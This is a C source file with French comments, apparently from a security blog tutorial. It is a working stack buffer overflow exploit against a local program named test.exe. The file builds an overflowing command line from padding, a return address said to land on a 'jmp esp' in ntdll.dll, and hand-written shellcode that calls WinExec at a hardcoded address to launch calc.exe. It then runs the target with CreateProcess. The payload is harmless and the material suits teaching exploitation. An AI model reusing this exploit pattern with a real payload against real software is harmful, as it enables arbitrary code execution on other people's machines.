#include <string.h>
#include <stdio.h>
#include <windows.h>

int main()
{
    STARTUPINFO si = {0};
    PROCESS_INFORMATION pi = {0};

    si.cb = sizeof(si);
    char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                        "\xBF\xB5\x15\x86\x7C" //mov edi,7C8615B5 l'adresse de WinExec est hardcodé, remplacer si necessaire.
                        "\xE8\xFF\xFF\xFF\xFF\xCC\x44\x58\x83"
                        "\xC0\x0B\x6A\x05\x50\xFF\xD7"
                        "C:\\WINDOWS\\system32\\calc.exe"; //Merci a rAsM pour son shellcode tout petit :)).

    char ret[] = "\xED\x1E\x95\x7C"; //dans ntdll.dll sur un jmp esp

    char name[] = "test.exe ";
    char* remplissage = (char*) malloc(sizeof(char) * 21);
    remplissage[20] = '\0';
    memset(remplissage,'a',20);

    int alloc = ((strlen(name) + strlen(remplissage) + strlen(ret) + strlen(shellcode) + 1 ));
    char* exploitation = (char*) malloc(sizeof(char)* alloc);

    ZeroMemory(exploitation,alloc);

    strncat(exploitation,name,strlen(name));
    strncat(exploitation,remplissage,strlen(remplissage));
    strncat(exploitation,ret,strlen(ret));
    strncat(exploitation,shellcode,strlen(shellcode));

    printf("Exploit 1 - 0vercl0k.blogspot.com.\n\nCreation du processus..\n");
    if(CreateProcess(NULL,exploitation,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
    {
        printf("Processus cree.\n");
    }
    WaitForSingleObject(pi.hProcess,INFINITE);
    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);
    return 0;
}